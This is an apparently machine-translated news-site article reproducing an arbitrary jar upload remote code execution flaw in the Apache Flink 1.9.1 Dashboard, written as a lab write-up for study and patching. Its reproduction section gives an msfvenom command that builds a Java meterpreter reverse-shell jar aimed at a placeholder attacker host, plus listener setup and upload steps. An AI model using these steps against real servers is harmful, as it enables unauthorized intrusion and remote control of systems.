Example Analysis of RCE vulnerability caused by uploading arbitrary Jar packets of Apache Flink 01/18 Update SLTechnology News&Howtos

Example Analysis of RCE vulnerability caused by uploading arbitrary Jar packets of Apache Flink

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article is to share with you the content of a sample analysis of RCE vulnerabilities uploaded to any Jar package of Apache Flink. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Overview of 0x01 vulnerabilities

Attackers can upload arbitrary jar packages directly in the Apache Flink Dashboard page, thus achieving remote code execution.

0x02 scope of influence

To date, Apache Flink version 1.9.1

0x03 environment building

Attack plane: kali

Victim: ubuntu16

1. Install the java8 environment and get your own Baidu tutorials

two。 Download the Flink1.9.1 version and extract the installation package

Flink download address: https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

Decompress tar-zxvf

3. Enter the bin directory to run. / start-cluster.sh startup environment

4. Open in the browser, the following interface indicates that the installation is successful

Recurrence of 0x04 vulnerabilities

1. First use kali to generate the backdoor package for jar

Msfvenom-p java/meterpreter/reverse_tcp LHOST=IP LPORT=port-f jar > shell.jar

two。 Use msfconsole to listen on the port set by shell

Use exploit/multi/handler

Set payload java/shell/reverse_tcp

3.run turns on listening

4. Visit the target site with the finished shell.jar package and upload the shell.jar

5. Click Submit to trigger the vulnerability and bounce back to shell

0x05 repair recommendation

Update the official patch or update the latest version

Thank you for reading! This is the end of the article on "sample analysis of RCE vulnerabilities uploaded to any Jar package of Apache Flink". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it out for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.